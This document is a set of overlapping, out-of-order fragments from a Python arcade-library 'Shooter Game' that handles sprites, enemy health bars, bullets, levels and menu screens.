"on_draw(self): \"\"\" Draw the game over view \"\"\" arcade.start_render() arcade.draw_text(\"Game Over!\\n\", SCREEN_WIDTH/2, SCREEN_HEIGHT/2.5,",
"ENEMY(\":resources:images/animated_characters/robot/robot_walk7.png\", SPRITE_SCALING_ENEMY, self.enemy_health) enemy2 = ENEMY(\":resources:images/animated_characters/robot/robot_fall.png\", SPRITE_SCALING_ENEMY_2, self.enemy_health2) # Position the enemy enemy.center_x",
"and self.window.level <= 3: for i in range(self.amount_of_enemies): # Create the enemy image",
"enemy.enemy_cur_health -= 1 # Check health if enemy.enemy_cur_health <= 0: # enemy dead",
"+= 2 #self.enemy_health += 1 self.speed += .20 arcade.play_sound(self.newLevel_sound) for enemy in self.enemy_list:",
"game logic \"\"\" self.player_sprite.change_x = 0 self.player_sprite.change_y = 0 if self.up_pressed and not",
"SCREEN_TITLE = \"Shooter Game\" SPRITE_SPEED = 0.20 BULLET_SPEED = 5 HEALTHBAR_WIDTH = 25",
"bullet.change_x = math.cos(angle) * BULLET_SPEED bullet.change_y = math.sin(angle) * BULLET_SPEED # Add the",
"bullet to see if it hit a enemy hit_list = arcade.check_for_collision_with_list(bullet, self.enemy_list) #",
"go off the screen if self.bottom < 0: self.bottom = 0 elif self.top",
"# enemy dead enemy.remove_from_sprite_lists() arcade.play_sound(self.death_sound) else: # Not dead arcade.play_sound(self.hit_sound) # If the",
"(HEALTHBAR_WIDTH +50) * (self.player_cur_health / self.player_max_health) arcade.draw_rectangle_filled(start_x - 0.5 * (HEALTHBAR_WIDTH - health_width),",
"if len(player_hit) > 0: enemy.remove_from_sprite_lists() for player in player_hit: # Make sure this",
"25 health_width = (HEALTHBAR_WIDTH +50) * (self.player_cur_health / self.player_max_health) arcade.draw_rectangle_filled(start_x - 0.5 *",
"\"\"\"Called when the user releases a key. \"\"\" if key == arcade.key.UP: self.up_pressed",
"in range(self.amount_of_enemies): # Create the enemy image enemy = ENEMY(\":resources:images/animated_characters/robot/robot_walk7.png\", SPRITE_SCALING_ENEMY, self.enemy_health) enemy2",
"in self.enemy_list: enemy3.follow_sprite(self.player_sprite) # update all sprites self.bullet_list.update() if len(self.enemy_list) == 0 and",
"height=HEALTHBAR_HEIGHT, color=arcade.color.GREEN) class MenuView(arcade.View): \"\"\" Class that manages the 'menu' view. \"\"\" def",
"\"\"\" Draw the menu \"\"\" arcade.start_render() start_x = 220 start_y = 370 arcade.draw_text(\"Shooter",
"the 'menu' view. \"\"\" def on_show(self): \"\"\" Called when switching to this view\"\"\"",
"width=health_width, height=HEALTHBAR_HEIGHT, color=arcade.color.GREEN) class MenuView(arcade.View): \"\"\" Class that manages the 'menu' view. \"\"\"",
"color=arcade.color.WHITE) def enemy_draw_health_bar(self): # Draw the health bar # Draw the red background",
"enemy.remove_from_sprite_lists() arcade.play_sound(self.death_sound) else: # Not dead arcade.play_sound(self.hit_sound) # If the bullet flies off-screen,",
"game_view.setup() self.window.show_view(game_view) arcade.run() class GameOverView(arcade.View): \"\"\" Class to manage the game over view",
"self.level = self.updated_level + 1 else: self.good = False else: for i in",
"+= self.change_angle def follow_sprite(self, player_sprite): # This tells the enemies to go to",
"Position the enemy enemy.center_x = random.randrange(SCREEN_WIDTH) enemy.center_y = random.randrange(120, SCREEN_HEIGHT) enemy2.center_x = random.randrange(SCREEN_WIDTH)",
"HEALTH_NUMBER_OFFSET_Y, font_size=12, color=arcade.color.WHITE) def enemy_draw_health_bar(self): # Draw the health bar # Draw the",
"arcade import math import os from arcade.color import BLACK, WHITE SPRITE_SCALING_PLAYER = .60",
"player_draw_health_bar(self): # Draw the health bar # Draw the red background start_x =",
"= arcade.load_sound(\"shooting_game/assets/sounds/death.wav\") self.gameOver_sound = arcade.load_sound(\"shooting_game/assets/sounds/gameOver.wav\") self.left_pressed = False self.right_pressed = False self.up_pressed =",
"= 0 self.player_sprite.change_y = 0 if self.up_pressed and not self.down_pressed: self.player_sprite.change_y = MOVEMENT_SPEED",
"enemy3.center_x = random.randrange(SCREEN_WIDTH) enemy3.center_y = random.randrange(120, SCREEN_HEIGHT) # Add the enemy to the",
"\"\"\" def __init__(self): \"\"\" Initializer \"\"\" # Call the parent class initializer #super().__init__(SCREEN_WIDTH,",
"= False self.width = SCREEN_WIDTH # Background image will be stored in this",
"SPRITE_SCALING_ENEMY, self.enemy_health) enemy2 = ENEMY(\":resources:images/animated_characters/robot/robot_fall.png\", SPRITE_SCALING_ENEMY_2, self.enemy_health2) # Position the enemy enemy.center_x =",
"\"\"\" Class to manage the game over view \"\"\" def on_show(self): \"\"\" Called",
"screen self.center_x += self.change_x self.center_y += self.change_y # Check for out-of-bounds if self.left",
"start_y = 35 if self.player_cur_health < self.player_max_health: arcade.draw_rectangle_filled(start_x + HEALTH_NUMBER_OFFSET_X, start_y + HEALTHBAR_OFFSET_Y,",
"enemy.center_y = random.randrange(120, SCREEN_HEIGHT) enemy2.center_x = random.randrange(SCREEN_WIDTH) enemy2.center_y = random.randrange(120, SCREEN_HEIGHT) # Add",
"WHITE SPRITE_SCALING_PLAYER = .60 SPRITE_SCALING_ENEMY = 0.5 SPRITE_SCALING_ENEMY_2 = 0.15 SPRITE_SCALING_ENEMY_3 = 0.3",
"= (HEALTHBAR_WIDTH +50) * (self.player_cur_health / self.player_max_health) arcade.draw_rectangle_filled(start_x - 0.5 * (HEALTHBAR_WIDTH -",
"== arcade.key.ESCAPE: menu_view = MenuView() self.window.show_view(menu_view) class MyGame(arcade.View): \"\"\" Main application class. \"\"\"",
"MenuView(arcade.View): \"\"\" Class that manages the 'menu' view. \"\"\" def on_show(self): \"\"\" Called",
"= ENEMY(\":resources:images/animated_characters/robot/robot_fall.png\", SPRITE_SCALING_ENEMY_2, self.enemy_health2) # Position the enemy enemy.center_x = random.randrange(SCREEN_WIDTH) enemy.center_y =",
"(self.enemy_cur_health / self.enemy_max_health) arcade.draw_rectangle_filled(center_x=self.center_x - 0.5 * (HEALTHBAR_WIDTH - health_width), center_y=self.center_y - 10,",
"+ HEALTH_NUMBER_OFFSET_X, start_y + HEALTHBAR_OFFSET_Y, width=HEALTHBAR_WIDTH + 60, height=HEALTHBAR_HEIGHT + 10, color=arcade.color.RED) #",
"0: bullet.remove_from_sprite_lists() # For every enemy we hit, process for enemy in hit_list:",
"color=arcade.color.RED) # Calculate width based on health start_x = 85 start_y = 25",
"SCREEN_HEIGHT - 1 class ENEMY(arcade.Sprite): def update(self): # Rotate the coin. # The",
"the health bar # Draw the red background if self.enemy_cur_health < self.enemy_max_health: arcade.draw_rectangle_filled(center_x=self.center_x,",
"240 arcade.draw_text(\"Use your mouse to aim\", start_x, start_y, arcade.color.RED, 15) start_x = 360",
"MOVEMENT_SPEED self.player_list.update() for enemy in self.enemy_list: enemy.follow_sprite(self.player_sprite) for enemy2 in self.enemy_list: enemy2.follow_sprite(self.player_sprite) for",
"f\"{self.player_cur_health}/{self.player_max_health}\" start_x = 25 start_y = 40 arcade.draw_text(health_string, start_x + HEALTH_NUMBER_OFFSET_X, start_y +",
"dead arcade.play_sound(self.hit_sound) # If the bullet flies off-screen, remove it. if bullet.bottom >",
"self.gameOver_sound = arcade.load_sound(\"shooting_game/assets/sounds/gameOver.wav\") self.left_pressed = False self.right_pressed = False self.up_pressed = False self.down_pressed",
"0 self.player_sprite.change_y = 0 if self.up_pressed and not self.down_pressed: self.player_sprite.change_y = MOVEMENT_SPEED elif",
"angle, calculate our change_x # and change_y. Velocity is how fast the bullet",
"enemy to the lists self.enemy_list.append(enemy) self.enemy_list.append(enemy2) self.enemy_list.append(enemy3) if self.enemy_list == 0: self.window.level =",
"arcade.play_sound(self.gun_sound) # Create a bullet bullet = arcade.Sprite(\":resources:images/space_shooter/meteorGrey_small1.png\", SPRITE_SCALING_BULLET) # Position the bullet",
">= 0 and self.window.level <= 3: for i in range(self.amount_of_enemies): # Create the",
"enemy hit_list = arcade.check_for_collision_with_list(bullet, self.enemy_list) # If it did, get rid of the",
"screen if self.bottom < 0: self.bottom = 0 elif self.top > SCREEN_HEIGHT -",
"__init__(self, image, scale, enemy_max_health): super().__init__(image, scale) # Add extra attributes for health self.enemy_max_health",
"\"\"\" Main application class. \"\"\" def __init__(self): \"\"\" Initializer \"\"\" # Call the",
"1 # Check health if enemy.enemy_cur_health <= 0: # enemy dead enemy.remove_from_sprite_lists() arcade.play_sound(self.death_sound)",
"extra attributes for health self.enemy_max_health = enemy_max_health self.enemy_cur_health = enemy_max_health def enemy_draw_health_number(self): #",
"sprite rotation. Change this, and the sprite rotates. self.angle += self.change_angle def follow_sprite(self,",
"bullet.top < 0 or bullet.right < 0 or bullet.left > self.width: bullet.remove_from_sprite_lists() def",
"ENEMY): raise TypeError(\"List contents must be all ints\") # Remove one health point",
"for enemy in self.enemy_list: enemy.enemy_draw_health_number() enemy.enemy_draw_health_bar() def on_mouse_press(self, x, y, button, modifiers): #",
"= PLAYER(\":resources:images/animated_characters/male_adventurer/maleAdventurer_walk1.png\", SPRITE_SCALING_PLAYER, player_max_health=10) self.player_sprite.center_x = 400 self.player_sprite.center_y = 300 self.player_list.append(self.player_sprite) self.levels() #",
"health point player.player_cur_health -= 1 # Check health if player.player_cur_health <= 0: arcade.play_sound(self.gameOver_sound)",
"# Remove one health point enemy.enemy_cur_health -= 1 # Check health if enemy.enemy_cur_health",
"TypeError(\"List contents must be all ints\") # Remove one health point enemy.enemy_cur_health -=",
"player.player_cur_health <= 0: arcade.play_sound(self.gameOver_sound) game_over = GameOverView() self.window.show_view(game_over) arcade.run() # enemy dead player.remove_from_sprite_lists()",
"# Get from the mouse the destination location for the bullet dest_x =",
"from the mouse the destination location for the bullet dest_x = x dest_y",
"= player_max_health self.player_cur_health = player_max_health def player_draw_health_number(self): # Draw how many health the",
"self.enemy_health3) # Position the enemy enemy.center_x = random.randrange(SCREEN_WIDTH) enemy.center_y = random.randrange(120, SCREEN_HEIGHT) enemy2.center_x",
"start_y = 270 arcade.draw_text(f\"You died in level: {self.window.level}\", start_x, start_y, arcade.color.RED, 20) arcade.draw_text(\"Click",
"dest_x = x dest_y = y # Do math to calculate how to",
"6: for i in range(self.amount_of_enemies): # Create the enemy image enemy = ENEMY(\":resources:images/animated_characters/robot/robot_walk7.png\",",
"class. \"\"\" def __init__(self): \"\"\" Initializer \"\"\" # Call the parent class initializer",
"-= 1 # Check health if player.player_cur_health <= 0: arcade.play_sound(self.gameOver_sound) game_over = GameOverView()",
"self.right_pressed = False self.up_pressed = False self.down_pressed = False self.width = SCREEN_WIDTH #",
"x_diff = dest_x - start_x y_diff = dest_y - start_y angle = math.atan2(y_diff,",
"self.center_x > player_sprite.center_x: self.center_x -= min(SPRITE_SPEED, self.center_x - player_sprite.center_x) def __init__(self, image, scale,",
"the enemy enemy.center_x = random.randrange(SCREEN_WIDTH) enemy.center_y = random.randrange(120, SCREEN_HEIGHT) enemy2.center_x = random.randrange(SCREEN_WIDTH) enemy2.center_y",
"to the destination. x_diff = dest_x - start_x y_diff = dest_y - start_y",
"whenever the mouse button is clicked arcade.play_sound(self.gun_sound) # Create a bullet bullet =",
"change_x # and change_y. Velocity is how fast the bullet travels. bullet.change_x =",
"self.player_cur_health = player_max_health def player_draw_health_number(self): # Draw how many health the enemies have",
"self.left_pressed = False elif key == arcade.key.RIGHT: self.right_pressed = False def on_draw(self): #",
"# Create a bullet bullet = arcade.Sprite(\":resources:images/space_shooter/meteorGrey_small1.png\", SPRITE_SCALING_BULLET) # Position the bullet at",
"start_x = 310 start_y = 240 arcade.draw_text(\"Use your mouse to aim\", start_x, start_y,",
"self.death_sound = arcade.load_sound(\"shooting_game/assets/sounds/deathenemy.wav\") self.playerDeath_sound = arcade.load_sound(\"shooting_game/assets/sounds/death.wav\") self.gameOver_sound = arcade.load_sound(\"shooting_game/assets/sounds/gameOver.wav\") self.left_pressed = False self.right_pressed",
"os from arcade.color import BLACK, WHITE SPRITE_SCALING_PLAYER = .60 SPRITE_SCALING_ENEMY = 0.5 SPRITE_SCALING_ENEMY_2",
"- start_y angle = math.atan2(y_diff, x_diff) # Taking into account the angle, calculate",
"start_y=self.center_y + HEALTH_NUMBER_OFFSET_Y, font_size=12, color=arcade.color.WHITE) def enemy_draw_health_bar(self): # Draw the health bar #",
"self.enemy_list = None self.bullet_list = None # Set up the player self.player_sprite =",
"\"\"\" if key == arcade.key.UP: self.up_pressed = False elif key == arcade.key.DOWN: self.down_pressed",
"== arcade.key.RIGHT: self.right_pressed = False def on_draw(self): # render the screen befroe start",
"10, height=HEALTHBAR_HEIGHT + 10, color=arcade.color.GREEN) def update(self): \"\"\" Move the player \"\"\" #",
"= SPRITE_SPEED # Game Sounds self.newLevel_sound = arcade.load_sound(\"shooting_game/assets/sounds/newLevel.wav\") self.gun_sound = arcade.load_sound(\"shooting_game/assets/sounds/shoot.wav\") self.hit_sound =",
"= 600 SCREEN_TITLE = \"Shooter Game\" SPRITE_SPEED = 0.20 BULLET_SPEED = 5 HEALTHBAR_WIDTH",
"for enemy in self.enemy_list: player_hit = arcade.check_for_collision_with_list(enemy, self.player_list) if len(player_hit) > 0: enemy.remove_from_sprite_lists()",
"= dest_y - start_y angle = math.atan2(y_diff, x_diff) # Taking into account the",
"manages the 'menu' view. \"\"\" def on_show(self): \"\"\" Called when switching to this",
"def update(self): # Rotate the coin. # The arcade.Sprite class has an \"angle\"",
"mouse the destination location for the bullet dest_x = x dest_y = y",
"\"\"\" Class that manages the 'menu' view. \"\"\" def on_show(self): \"\"\" Called when",
"= 25 health_width = (HEALTHBAR_WIDTH +50) * (self.player_cur_health / self.player_max_health) arcade.draw_rectangle_filled(start_x - 0.5",
"self.enemy_cur_health < self.enemy_max_health: arcade.draw_rectangle_filled(center_x=self.center_x, center_y=self.center_y + HEALTHBAR_OFFSET_Y, width=HEALTHBAR_WIDTH, height=3, color=arcade.color.RED) # Calculate width",
"arcade.key.DOWN: self.down_pressed = False elif key == arcade.key.LEFT: self.left_pressed = False elif key",
"25, anchor_x=\"center\") def on_key_press(self, key, _modifiers): \"\"\" If user hits escape, go back",
"self.player_sprite.center_y bullet.center_x = start_x bullet.center_y = start_y # Get from the mouse the",
"tells the enemies to go to the main guy if self.center_y < player_sprite.center_y:",
"bullet.bottom > self.width or bullet.top < 0 or bullet.right < 0 or bullet.left",
"your keyboard to move around\", start_x, start_y, arcade.color.RED, 15) start_x = 310 start_y",
"bullet in self.bullet_list: # Check this bullet to see if it hit a",
"start_y , width=health_width + 10, height=HEALTHBAR_HEIGHT + 10, color=arcade.color.GREEN) def update(self): \"\"\" Move",
"SPRITE_SCALING_BULLET) # Position the bullet at the player's current location start_x = self.player_sprite.center_x",
"an \"angle\" attribute that controls # the sprite rotation. Change this, and the",
"Set the background color self.background = arcade.load_texture(\":resources:images/backgrounds/abstract_1.jpg\") def on_key_press(self, key, modifiers): \"\"\"Called whenever",
"enemies have health_string = f\"{self.player_cur_health}/{self.player_max_health}\" start_x = 25 start_y = 40 arcade.draw_text(health_string, start_x",
"SCREEN_HEIGHT) enemy2.center_x = random.randrange(SCREEN_WIDTH) enemy2.center_y = random.randrange(120, SCREEN_HEIGHT) # Add the enemy to",
"+= 1 self.good = True self.levels() self.amount_of_enemies += 2 #self.enemy_health += 1 self.speed",
"self.enemy_health2) # Position the enemy enemy.center_x = random.randrange(SCREEN_WIDTH) enemy.center_y = random.randrange(120, SCREEN_HEIGHT) enemy2.center_x",
"= 0 # game = MyGame() # game.setup() # arcade.run() if __name__ ==",
"self.enemy_list: player_hit = arcade.check_for_collision_with_list(enemy, self.player_list) if len(player_hit) > 0: enemy.remove_from_sprite_lists() for player in",
"anchor_x=\"center\") def on_key_press(self, key, _modifiers): \"\"\" If user hits escape, go back to",
"arcade.run() # enemy dead player.remove_from_sprite_lists() else: # Not dead arcade.play_sound(self.playerDeath_sound) # Loop through",
"self.background = arcade.load_texture(\":resources:images/backgrounds/abstract_1.jpg\") def on_key_press(self, key, modifiers): \"\"\"Called whenever a key is pressed.",
"Velocity is how fast the bullet travels. bullet.change_x = math.cos(angle) * BULLET_SPEED bullet.change_y",
"Add extra attributes for health self.enemy_max_health = enemy_max_health self.enemy_cur_health = enemy_max_health def enemy_draw_health_number(self):",
"< 0 or bullet.right < 0 or bullet.left > self.width: bullet.remove_from_sprite_lists() def main():",
"Draw the red background if self.enemy_cur_health < self.enemy_max_health: arcade.draw_rectangle_filled(center_x=self.center_x, center_y=self.center_y + HEALTHBAR_OFFSET_Y, width=HEALTHBAR_WIDTH,",
"menu_view = MenuView() self.window.show_view(menu_view) class MyGame(arcade.View): \"\"\" Main application class. \"\"\" def __init__(self):",
"1 self.good = True self.levels() self.amount_of_enemies += 2 #self.enemy_health += 1 self.speed +=",
"SCREEN_WIDTH - 1 # Make sure he cant go off the screen if",
"this, and the sprite rotates. self.angle += self.change_angle def follow_sprite(self, player_sprite): # This",
"self.bottom < 0: self.bottom = 0 elif self.top > SCREEN_HEIGHT - 1: self.top",
"= False elif key == arcade.key.DOWN: self.down_pressed = False elif key == arcade.key.LEFT:",
"False elif key == arcade.key.LEFT: self.left_pressed = False elif key == arcade.key.RIGHT: self.right_pressed",
"- player_sprite.center_x) def __init__(self, image, scale, enemy_max_health): super().__init__(image, scale) # Add extra attributes",
"the background color self.background = arcade.load_texture(\":resources:images/backgrounds/abstract_1.jpg\") def on_key_press(self, key, modifiers): \"\"\"Called whenever a",
"dead player.remove_from_sprite_lists() else: # Not dead arcade.play_sound(self.playerDeath_sound) # Loop through each bullet for",
"_modifiers): \"\"\" Use a mouse press to advance to the 'game' view. \"\"\"",
"random import arcade import math import os from arcade.color import BLACK, WHITE SPRITE_SCALING_PLAYER",
"location for the bullet dest_x = x dest_y = y # Do math",
"hit, process for enemy in hit_list: # Make sure this is the right",
"sprites self.bullet_list.update() if len(self.enemy_list) == 0 and self.window.level > self.updated_level: self.window.level += 1",
"self.width = SCREEN_WIDTH # Background image will be stored in this variable self.background",
"arcade.key.UP: self.up_pressed = False elif key == arcade.key.DOWN: self.down_pressed = False elif key",
"+ HEALTHBAR_OFFSET_Y, width=HEALTHBAR_WIDTH + 60, height=HEALTHBAR_HEIGHT + 10, color=arcade.color.RED) # Calculate width based",
"main(): window = arcade.Window(SCREEN_WIDTH, SCREEN_HEIGHT, \"Shooter Game\") menu_view = MenuView() window.show_view(menu_view) arcade.run() window.level",
"\"\"\" Use a mouse press to advance to the 'game' view. \"\"\" game_view",
"image enemy = ENEMY(\":resources:images/animated_characters/robot/robot_walk7.png\", SPRITE_SCALING_ENEMY, self.enemy_health) enemy2 = ENEMY(\":resources:images/animated_characters/robot/robot_fall.png\", SPRITE_SCALING_ENEMY_2, self.enemy_health2) # Position",
"is pressed. \"\"\" if key == arcade.key.UP: self.up_pressed = True elif key ==",
"self.player_list: player.player_draw_health_number() player.player_draw_health_bar() for enemy in self.enemy_list: enemy.enemy_draw_health_number() enemy.enemy_draw_health_bar() def on_mouse_press(self, x, y,",
"= 1 self.updated_level = -1 self.amount_of_enemies = 5 self.speed = SPRITE_SPEED # Game",
"a enemy hit_list = arcade.check_for_collision_with_list(bullet, self.enemy_list) # If it did, get rid of",
"self.window.show_view(game_view) arcade.run() class GameOverView(arcade.View): \"\"\" Class to manage the game over view \"\"\"",
"\"\"\" If user hits escape, go back to the main menu view \"\"\"",
"1 self.speed += .20 arcade.play_sound(self.newLevel_sound) for enemy in self.enemy_list: player_hit = arcade.check_for_collision_with_list(enemy, self.player_list)",
"self.updated_level + 1 else: self.good = False else: for i in range(self.amount_of_enemies): #",
"attributes for health self.enemy_max_health = enemy_max_health self.enemy_cur_health = enemy_max_health def enemy_draw_health_number(self): # Draw",
"Position the enemy enemy.center_x = random.randrange(SCREEN_WIDTH) enemy.center_y = random.randrange(120, SCREEN_HEIGHT) # Add the",
"application class. \"\"\" def __init__(self): \"\"\" Initializer \"\"\" # Call the parent class",
"self.window.level = self.updated_level + 1 arcade.play_sound(self.newLevel_sound) else: self.good = False elif self.window.level >",
"= f\"{self.player_cur_health}/{self.player_max_health}\" start_x = 25 start_y = 40 arcade.draw_text(health_string, start_x + HEALTH_NUMBER_OFFSET_X, start_y",
"else: self.good = False elif self.window.level > 3 and self.window.level < 6: for",
"self.good = False else: for i in range(self.amount_of_enemies): # Create the enemy image",
"= 0.3 SPRITE_SCALING_BULLET = 0.7 ENEMY_COUNT = 15 SCREEN_WIDTH = 800 SCREEN_HEIGHT =",
"sprite rotates. self.angle += self.change_angle def follow_sprite(self, player_sprite): # This tells the enemies",
"# Draw the health bar # Draw the red background if self.enemy_cur_health <",
"manage the game over view \"\"\" def on_show(self): \"\"\" Called when switching to",
"\"\"\" Move the player \"\"\" # Move player around the screen self.center_x +=",
"for out-of-bounds if self.left < 0: self.left = 0 elif self.right > SCREEN_WIDTH",
"must be all ints\") # Remove one health point player.player_cur_health -= 1 #",
"y, button, modifiers): # Called whenever the mouse button is clicked arcade.play_sound(self.gun_sound) #",
"= 210 arcade.draw_text(\"Click to Shoot\", start_x, start_y, arcade.color.RED, 15) start_x = 330 start_y",
"= ENEMY(\":resources:images/animated_characters/robot/robot_walk7.png\", SPRITE_SCALING_ENEMY, self.enemy_health) enemy2 = ENEMY(\":resources:images/animated_characters/robot/robot_fall.png\", SPRITE_SCALING_ENEMY_2, self.enemy_health2) # Position the enemy",
"False self.up_pressed = False self.down_pressed = False self.width = SCREEN_WIDTH # Background image",
"-= min(SPRITE_SPEED, self.center_y - player_sprite.center_y) if self.center_x < player_sprite.center_x: self.center_x += min(SPRITE_SPEED, player_sprite.center_x",
"False def on_draw(self): # render the screen befroe start drawing arcade.start_render() arcade.draw_lrwh_rectangle_textured(0, 0,",
"arcade.draw_text(\"Use your mouse to aim\", start_x, start_y, arcade.color.RED, 15) start_x = 360 start_y",
"# Check for out-of-bounds if self.left < 0: self.left = 0 elif self.right",
".20 arcade.play_sound(self.newLevel_sound) for enemy in self.enemy_list: player_hit = arcade.check_for_collision_with_list(enemy, self.player_list) if len(player_hit) >",
"game # Sprite lists self.window.level = 1 self.player_list = arcade.SpriteList() self.enemy_list = arcade.SpriteList()",
"import os from arcade.color import BLACK, WHITE SPRITE_SCALING_PLAYER = .60 SPRITE_SCALING_ENEMY = 0.5",
"< self.player_max_health: arcade.draw_rectangle_filled(start_x + HEALTH_NUMBER_OFFSET_X, start_y + HEALTHBAR_OFFSET_Y, width=HEALTHBAR_WIDTH + 60, height=HEALTHBAR_HEIGHT +",
"self.enemy_health) enemy2 = ENEMY(\":resources:images/animated_characters/robot/robot_fall.png\", SPRITE_SCALING_ENEMY_2, self.enemy_health2) enemy3 = ENEMY(\":resources:images/enemies/saw.png\", SPRITE_SCALING_ENEMY_3, self.enemy_health3) # Position",
"view. \"\"\" def on_show(self): \"\"\" Called when switching to this view\"\"\" arcade.set_background_color(arcade.color.BLACK) def",
"Get from the mouse the destination location for the bullet dest_x = x",
"min(SPRITE_SPEED, self.center_x - player_sprite.center_x) def __init__(self, image, scale, enemy_max_health): super().__init__(image, scale) # Add",
"SCREEN_HEIGHT/2.5, arcade.color.RED, 100, anchor_x=\"center\") start_x = 290 start_y = 270 arcade.draw_text(f\"You died in",
"elif key == arcade.key.DOWN: self.down_pressed = False elif key == arcade.key.LEFT: self.left_pressed =",
"+= self.change_x self.center_y += self.change_y # Check for out-of-bounds if self.left < 0:",
"< player_sprite.center_x: self.center_x += min(SPRITE_SPEED, player_sprite.center_x - self.center_x) elif self.center_x > player_sprite.center_x: self.center_x",
"the enemy image enemy = ENEMY(\":resources:images/animated_characters/robot/robot_walk7.png\", SPRITE_SCALING_ENEMY, self.enemy_health) # Position the enemy enemy.center_x",
"this variable self.background = None def levels(self): while self.good: if self.window.level >= 0",
"Check for out-of-bounds if self.left < 0: self.left = 0 elif self.right >",
"for enemy in self.enemy_list: enemy.follow_sprite(self.player_sprite) for enemy2 in self.enemy_list: enemy2.follow_sprite(self.player_sprite) for enemy3 in",
"arcade.play_sound(self.hit_sound) # If the bullet flies off-screen, remove it. if bullet.bottom > self.width",
"For every enemy we hit, process for enemy in hit_list: # Make sure",
"lists self.window.level = 1 self.player_list = arcade.SpriteList() self.enemy_list = arcade.SpriteList() self.bullet_list = arcade.SpriteList()",
"all ints\") # Remove one health point player.player_cur_health -= 1 # Check health",
"HEALTHBAR_OFFSET_Y, width=HEALTHBAR_WIDTH, height=3, color=arcade.color.RED) # Calculate width based on health health_width = HEALTHBAR_WIDTH",
"enemy_draw_health_number(self): # Draw how many health the enemies have health_string = f\"{self.enemy_cur_health}/{self.enemy_max_health}\" arcade.draw_text(health_string,",
"# Background image will be stored in this variable self.background = None def",
"self.good = False elif self.window.level > 3 and self.window.level < 6: for i",
"sure he cant go off the screen if self.bottom < 0: self.bottom =",
"\"\"\" Initializer \"\"\" # Call the parent class initializer #super().__init__(SCREEN_WIDTH, SCREEN_HEIGHT, SCREEN_TITLE) super().__init__()",
"health self.player_max_health = player_max_health self.player_cur_health = player_max_health def player_draw_health_number(self): # Draw how many",
"+ HEALTH_NUMBER_OFFSET_X, start_y + HEALTH_NUMBER_OFFSET_Y, arcade.color.WHITE, 12) # arcade.draw_text(health_string, # start_x=self.center_x + HEALTH_NUMBER_OFFSET_X,",
"- player_sprite.center_y) if self.center_x < player_sprite.center_x: self.center_x += min(SPRITE_SPEED, player_sprite.center_x - self.center_x) elif",
"arcade.play_sound(self.gameOver_sound) game_over = GameOverView() self.window.show_view(game_over) arcade.run() # enemy dead player.remove_from_sprite_lists() else: # Not",
"self.center_y > player_sprite.center_y: self.center_y -= min(SPRITE_SPEED, self.center_y - player_sprite.center_y) if self.center_x < player_sprite.center_x:",
"enemy.enemy_draw_health_number() enemy.enemy_draw_health_bar() def on_mouse_press(self, x, y, button, modifiers): # Called whenever the mouse",
"self.left_pressed = False self.right_pressed = False self.up_pressed = False self.down_pressed = False self.width",
"enemy dead player.remove_from_sprite_lists() else: # Not dead arcade.play_sound(self.playerDeath_sound) # Loop through each bullet",
"arcade.check_for_collision_with_list(bullet, self.enemy_list) # If it did, get rid of the bullet if len(hit_list)",
"start drawing arcade.start_render() arcade.draw_lrwh_rectangle_textured(0, 0, SCREEN_WIDTH, SCREEN_HEIGHT, self.background) # Draw all the sprites",
"False self.right_pressed = False self.up_pressed = False self.down_pressed = False self.width = SCREEN_WIDTH",
"Called when switching to this view\"\"\" arcade.set_background_color(arcade.color.BLACK) def on_draw(self): \"\"\" Draw the game",
"the enemy to the lists self.enemy_list.append(enemy) self.enemy_list.append(enemy2) if self.enemy_list == 0: self.level =",
"(HEALTHBAR_WIDTH - health_width), center_y=self.center_y - 10, width=health_width, height=HEALTHBAR_HEIGHT, color=arcade.color.GREEN) class MenuView(arcade.View): \"\"\" Class",
"raise TypeError(\"List contents must be all ints\") # Remove one health point enemy.enemy_cur_health",
"- start_x y_diff = dest_y - start_y angle = math.atan2(y_diff, x_diff) # Taking",
"the coin. # The arcade.Sprite class has an \"angle\" attribute that controls #",
"start_y = 370 arcade.draw_text(\"Shooter Game\", start_x, start_y, arcade.color.WHITE, 50) self.player_sprite = PLAYER(\":resources:images/animated_characters/male_adventurer/maleAdventurer_walk1.png\", SPRITE_SCALING_PLAYER,",
"= None self.bullet_list = None # Set up the player self.player_sprite = None",
"start_x = 360 start_y = 210 arcade.draw_text(\"Click to Shoot\", start_x, start_y, arcade.color.RED, 15)",
"when the user releases a key. \"\"\" if key == arcade.key.UP: self.up_pressed =",
"Draw the health bar # Draw the red background if self.enemy_cur_health < self.enemy_max_health:",
"# Called whenever the mouse button is clicked arcade.play_sound(self.gun_sound) # Create a bullet",
"# Set the background color self.background = arcade.load_texture(\":resources:images/backgrounds/abstract_1.jpg\") def on_key_press(self, key, modifiers): \"\"\"Called",
"view. \"\"\" game_view = MyGame() game_view.setup() self.window.show_view(game_view) arcade.run() class GameOverView(arcade.View): \"\"\" Class to",
"_button, _modifiers): \"\"\" Use a mouse press to advance to the 'game' view.",
"* BULLET_SPEED bullet.change_y = math.sin(angle) * BULLET_SPEED # Add the bullet to the",
"arcade.color.WHITE, 12) # arcade.draw_text(health_string, # start_x=self.center_x + HEALTH_NUMBER_OFFSET_X, # start_y=self.center_y + HEALTH_NUMBER_OFFSET_Y, #",
"- self.center_y) elif self.center_y > player_sprite.center_y: self.center_y -= min(SPRITE_SPEED, self.center_y - player_sprite.center_y) if",
"self.good: if self.window.level >= 0 and self.window.level <= 3: for i in range(self.amount_of_enemies):",
"self.enemy_list: enemy3.follow_sprite(self.player_sprite) # update all sprites self.bullet_list.update() if len(self.enemy_list) == 0 and self.window.level",
"start_x=self.center_x + HEALTH_NUMBER_OFFSET_X, # start_y=self.center_y + HEALTH_NUMBER_OFFSET_Y, # font_size=12, # color=arcade.color.WHITE) def player_draw_health_bar(self):",
"that manages the 'menu' view. \"\"\" def on_show(self): \"\"\" Called when switching to",
"levels(self): while self.good: if self.window.level >= 0 and self.window.level <= 3: for i",
"start_y + HEALTHBAR_OFFSET_Y, width=HEALTHBAR_WIDTH + 60, height=HEALTHBAR_HEIGHT + 10, color=arcade.color.RED) # Calculate width",
"Remove one health point player.player_cur_health -= 1 # Check health if player.player_cur_health <=",
"for enemy in hit_list: # Make sure this is the right sprite if",
"= self.updated_level + 1 arcade.play_sound(self.newLevel_sound) else: self.good = False elif self.window.level > 3",
"did, get rid of the bullet if len(hit_list) > 0: bullet.remove_from_sprite_lists() # For",
"start_y = 210 arcade.draw_text(\"Click to Shoot\", start_x, start_y, arcade.color.RED, 15) start_x = 330",
"all the sprites self.enemy_list.draw() self.bullet_list.draw() self.player_list.draw() output = f\"Level: {self.window.level}\" arcade.draw_text(output, 12, 45,",
